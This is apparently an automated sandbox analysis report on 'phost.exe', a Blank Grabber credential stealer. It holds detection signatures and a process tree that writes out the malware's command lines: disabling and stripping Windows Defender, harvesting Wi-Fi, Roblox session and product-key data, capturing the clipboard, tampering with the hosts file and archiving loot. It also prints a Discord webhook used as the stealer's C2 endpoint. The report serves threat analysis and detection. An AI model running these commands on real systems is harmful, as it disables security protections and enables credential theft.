
Windows Analysis Report
phost.exe

Overview

General Information

Sample name: phost.exe
Analysis ID: 1574326
MD5: 8c43bf4445cac5fa025b9dfd07517b6f
SHA1: b7e9e405e3867213cd3e544574ceff70bef2b6fb
SHA256: dcf517b48094726367f1fdb2ace3f2cfd29f4f9710512f45ecb0109d03cc0dcc
Tags: exegithub-com--hombozuser-JAMESWT_MHT

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • phost.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\phost.exe" MD5: 8C43BF4445CAC5FA025B9DFD07517B6F)
    • phost.exe (PID: 3444 cmdline: "C:\Users\user\Desktop\phost.exe" MD5: 8C43BF4445CAC5FA025B9DFD07517B6F)
      • cmd.exe (PID: 1136 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3140 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2912 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7764 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 2200 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 3848 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 2872 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7180 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7208 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7324 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7580 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7712 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7736 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7808 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7988 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8068 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7208 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7628 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7192 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7540 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2000 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7664 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5780 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 4248 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7816 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7936 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 4180 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 2084 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7948 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8120 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 4076 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8108 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 3492 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 3748 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7400 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7752 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8064 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 2840 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7700 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7768 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 4340 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 1420 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 3020 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7916 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4940 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 2308 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7276 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 4444 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7228 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2564 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7000 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7092 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7412 cmdline: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7420 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2208 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1420 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 1704 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3940 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2648 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3244 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8100 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1196 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7256 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4940 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7620 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}
Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\_MEI32202\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security
00000001.00000003.1702090319.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'", ProcessId: 1136, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\phost.exe", ParentImage: C:\Users\user\Desktop\phost.exe, ParentProcessId: 3444, ParentProcessName: phost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 5544, ProcessName: cmd.exe
